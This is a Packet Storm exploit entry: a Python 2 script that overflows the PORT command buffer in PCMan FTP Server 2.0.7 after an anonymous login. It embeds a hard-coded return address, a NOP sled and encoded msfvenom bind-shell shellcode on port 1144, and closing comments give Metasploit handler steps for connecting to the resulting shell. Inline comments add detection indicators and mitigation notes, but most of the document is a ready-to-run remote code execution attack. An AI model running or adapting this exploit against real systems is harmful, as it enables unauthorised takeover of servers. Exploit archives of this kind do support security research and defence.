PCMan FTP Server 2.0.7 PORT Buffer Overflow

2016-11-04T00:00:00
ID PACKETSTORM:139569
Type packetstorm
Reporter Pablo Gonzalez
Modified 2016-11-04T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
#-*- coding: utf-8 -*-

# Exploit Title: PCMan FTP Server 2.0 PORT Command BoF Exploit
# Author: Pablo González
# Date: 4/11/2016
# Software: PCMan 2.0
# Tested on: Windows XP Profesional SP3 Spanish x86
#
# Proof-of-concept from the advisory: a single FTP control session logs in
# as "anonymous" and sends a PORT command whose argument is roughly 2 KB,
# which overflows a stack buffer in the server's command handling.
# Written for Python 2 (print statement, raw_input, str used as raw bytes).
#
# Defender's view of what this script makes observable:
#   - an FTP login as anonymous with an empty PASS, followed by one PORT
#     command with a ~2 KB argument (mostly 0x41 bytes) -- easy to match in
#     FTP control-channel logs or a network IDS rule on argument length;
#   - on success the payload opens a TCP listener on port 1144 on the FTP
#     host (see the msfvenom line below), i.e. an unexpected new listening
#     port on the server is the post-exploitation indicator.
# Mitigation is to not expose this server (no fix is referenced on this
# page) and, in general, to bound the length of FTP command arguments
# before copying them into fixed-size buffers.

import socket

print "Creating malicious input!"

# Payload layout: filler up to the saved return address, a fixed address
# overwriting it, a short NOP sled, then the shellcode.
# 2007 is the offset to the saved return address that the author reports
# for the build listed under "Tested on" above; it is not derived here.
junk = '\x41'*2007
# Fixed address inside User32.dll (little-endian 0x7E3C56F7) -- only
# meaningful on the exact tested OS/language build, since the address is
# hard-coded rather than resolved at run time.
ret="\xf7\x56\x3c\x7e" #User32.dll 7E3C56F7
nops = '\x90'*20  # 20-byte NOP sled

#msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c
#put shellcode in variable 'sc'

# Encoded bind-shell payload (listens on TCP 1144 per the msfvenom line);
# the encoder avoided \x0a, \x00 and \x0d since those would terminate the
# FTP command line or the C string.
sc=("\xdb\xd6\xba\xd3\x95\x1b\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x53\x31\x50\x17\x83\xe8\xfc\x03\x83\x86\xf9\x25\xdf\x41\x7f"
"\xc5\x1f\x92\xe0\x4f\xfa\xa3\x20\x2b\x8f\x94\x90\x3f\xdd\x18"
"\x5a\x6d\xf5\xab\x2e\xba\xfa\x1c\x84\x9c\x35\x9c\xb5\xdd\x54"
"\x1e\xc4\x31\xb6\x1f\x07\x44\xb7\x58\x7a\xa5\xe5\x31\xf0\x18"
"\x19\x35\x4c\xa1\x92\x05\x40\xa1\x47\xdd\x63\x80\xd6\x55\x3a"
"\x02\xd9\xba\x36\x0b\xc1\xdf\x73\xc5\x7a\x2b\x0f\xd4\xaa\x65"
"\xf0\x7b\x93\x49\x03\x85\xd4\x6e\xfc\xf0\x2c\x8d\x81\x02\xeb"
"\xef\x5d\x86\xef\x48\x15\x30\xcb\x69\xfa\xa7\x98\x66\xb7\xac"
"\xc6\x6a\x46\x60\x7d\x96\xc3\x87\x51\x1e\x97\xa3\x75\x7a\x43"
"\xcd\x2c\x26\x22\xf2\x2e\x89\x9b\x56\x25\x24\xcf\xea\x64\x21"
"\x3c\xc7\x96\xb1\x2a\x50\xe5\x83\xf5\xca\x61\xa8\x7e\xd5\x76"
"\xcf\x54\xa1\xe8\x2e\x57\xd2\x21\xf5\x03\x82\x59\xdc\x2b\x49"
"\x99\xe1\xf9\xe4\x91\x44\x52\x1b\x5c\x36\x02\x9b\xce\xdf\x48"
"\x14\x31\xff\x72\xfe\x5a\x68\x8f\x01\x60\x11\x06\xe7\x02\xf1"
"\x4e\xbf\xba\x33\xb5\x08\x5d\x4b\x9f\x20\xc9\x04\xc9\xf7\xf6"
"\x94\xdf\x5f\x60\x1f\x0c\x64\x91\x20\x19\xcc\xc6\xb7\xd7\x9d"
"\xa5\x26\xe7\xb7\x5d\xca\x7a\x5c\x9d\x85\x66\xcb\xca\xc2\x59"
"\x02\x9e\xfe\xc0\xbc\xbc\x02\x94\x87\x04\xd9\x65\x09\x85\xac"
"\xd2\x2d\x95\x68\xda\x69\xc1\x24\x8d\x27\xbf\x82\x67\x86\x69"
"\x5d\xdb\x40\xfd\x18\x17\x53\x7b\x25\x72\x25\x63\x94\x2b\x70"
"\x9c\x19\xbc\x74\xe5\x47\x5c\x7a\x3c\xcc\x6c\x31\x1c\x65\xe5"
"\x9c\xf5\x37\x68\x1f\x20\x7b\x95\x9c\xc0\x04\x62\xbc\xa1\x01"
"\x2e\x7a\x5a\x78\x3f\xef\x5c\x2f\x40\x3a")

# Full PORT argument. NOTE: `buffer` shadows a Python 2 builtin; harmless
# here, but it is why the name reads oddly.
buffer= junk + ret + nops + sc

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = raw_input('Give me Remote IP Address:')
# socket.connect() returns None, so `connect` is never meaningful.
connect=s.connect((ip,21))
# Single recv of the greeting; a long or fragmented banner is not reassembled.
banner = s.recv(1024)
print banner
# Anonymous login with an empty password; the replies are read and
# discarded, so no check is made that the server actually accepted them.
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS\r\n')
s.recv(1024)
#Sending input PORT command (Exploitation is coming)
s.send('PORT' + buffer + '\r\n')
s.close()

#Metasploit exploit/multi/handler or nc <ip> <port> :D
#
# For exploit/multi/handler
#
# use exploit/multi/handler
# set PAYLOAD windows/shell_bind_tcp
# set RHOST <ip>
# set LPORT 1144
# exploit
# ...
# Got it!

# Printed unconditionally: nothing above verifies whether the overflow
# actually succeeded.
print "Got it? :D"
  
`